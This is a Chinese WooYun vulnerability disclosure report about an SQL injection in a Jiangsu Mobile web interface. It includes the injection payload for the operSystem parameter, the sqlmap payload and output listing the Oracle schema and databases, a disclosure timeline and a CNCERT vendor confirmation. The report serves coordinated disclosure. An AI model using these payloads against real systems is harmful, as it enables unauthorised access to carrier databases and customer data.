漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0188023
漏洞标题:中国移动某省级站点接口存在SQL注入涉及大量敏感信息
相关厂商:江苏移动
漏洞作者: 路人甲
提交时间:2016-03-23 13:10
修复时间:2016-05-09 17:49
公开时间:2016-05-09 17:49
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-03-23: 细节已通知厂商并且等待厂商处理中
2016-03-25: 厂商已经确认,细节仅向厂商公开
2016-04-04: 细节向核心白帽子及相关领域专家公开
2016-04-14: 细节向普通白帽子公开
2016-04-24: 细节向实习白帽子公开
2016-05-09: 细节向公众公开
简要描述:
江苏移动某接口存在SQL注入涉及大量敏感信息
详细说明:
存在问题的请求如下
operSystem存在注入
注入payload如下
operSystem=5')+and+('1'='1
漏洞证明:
sqlmap获取数据如下:
当前库KFZXBTB
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: reqUrl=phoneSearchCenterNew&brand=&operSystem=5') AND 2851=2851 AND ('PpGp'='PpGp&price=&screenSize=&mobileCPUType=&networkMode=&hasStock=false&supplierNum=&keyValue=%E8%81%94%E6%83%B3&brandKey=undefined&classifyKey=undefined&flag=
---
[21:10:10] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:10:10] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 3.0, JSP, JSP 2.2, Nginx
back-end DBMS: Oracle
[21:10:10] [INFO] fetching current database
[21:10:10] [INFO] resuming partial value: K
[21:10:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:10:10] [INFO] retrieved:
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n]
FZXBTB
[21:13:54] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'KFZXBTB'
[21:13:54] [INFO] fetched data logged to text files under '/root/.sqlmap/output/**.**.**.**'
[*] shutting down at 21:13:54
available databases [4]:
[*] KFZXBTB
[*] SYS
[*] SYSTEM
[*] TSMS1
里面的库都很大,动不动就几千张表。。。
修复方案:
过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2016-03-25 17:49
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置
最新状态:
暂无